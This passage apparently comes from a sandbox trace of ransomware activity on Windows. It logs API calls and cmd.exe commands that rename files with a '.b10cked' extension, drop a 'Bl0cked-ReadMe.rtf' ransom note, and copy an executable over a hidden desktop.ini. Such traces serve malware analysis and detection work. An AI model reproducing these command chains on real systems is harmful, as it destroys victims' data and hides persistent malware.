lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0200.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x131322c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nslist.hxl", lpUsedDefaultChar=0x0) returned 10 [0200.045] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x21d0 [0200.045] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.045] CloseHandle (hObject=0x120) returned 1 [0200.046] 
GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\nslist.hxl", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl") returned 0x25 [0200.047] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0200.047] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf64, dwThreadId=0xecc)) returned 1 [0200.123] CloseHandle (hObject=0x1b4) returned 1 [0200.123] CloseHandle (hObject=0x120) returned 1 [0200.123] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.123] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.123] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0200.123] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.123] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0200.123] ReleaseMutex (hMutex=0xf8) returned 1 [0200.124] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25691598098) returned 1 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x272 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x272 [0200.128] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x272 [0200.128] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x272 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0200.129] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.129] ReadFile (in: hFile=0x120, lpBuffer=0x14a8f78, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesRead=0x12ec08*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0200.130] WriteFile (in: hFile=0x120, lpBuffer=0x14a8f78*, nNumberOfBytesToWrite=0x138, 
lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesWritten=0x12ec1c*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=-312, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13a [0200.130] ReadFile (in: hFile=0x120, lpBuffer=0x14a8f78, nNumberOfBytesToRead=0x138, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesRead=0x12ec08*=0x138, lpOverlapped=0x0) returned 1 [0200.130] SetFilePointer (in: hFile=0x120, lDistanceToMove=-312, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x13a [0200.130] WriteFile (in: hFile=0x120, lpBuffer=0x14a8f78*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14a8f78*, lpNumberOfBytesWritten=0x12ec1c*=0x138, lpOverlapped=0x0) returned 1 [0200.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0200.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x131324c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0200.135] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x272 [0200.135] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0200.136] CloseHandle (hObject=0x120) returned 1 [0200.137] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package 
Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm") returned 0x2d [0200.137] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.138] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\state.rsm.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd30, dwThreadId=0xfc8)) returned 1 [0200.149] CloseHandle (hObject=0x1b4) returned 1 [0200.149] CloseHandle (hObject=0x120) returned 1 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0200.149] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount1=72, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 3 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0200.149] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0200.149] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0200.149] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0200.149] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0200.149] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0200.149] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.150] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0200.150] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0200.150] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xef0, dwThreadId=0xe1c)) returned 1 [0200.155] CloseHandle (hObject=0x1b4) returned 1 [0200.155] CloseHandle (hObject=0x120) returned 1 [0200.156] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf")) returned 0xffffffff [0200.156] GetLastError () returned 0x2 [0200.156] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0200.254] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\bl0cked-readme.rtf")) returned 0x20 [0200.254] 
CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0200.254] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0200.254] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0200.254] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0200.254] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0200.254] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0200.254] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0200.254] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\") returned 0x24 [0200.255] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0200.255] 
CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0200.255] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1") returned 0x23 [0200.255] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x14a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x14a [0200.255] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0200.256] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, 
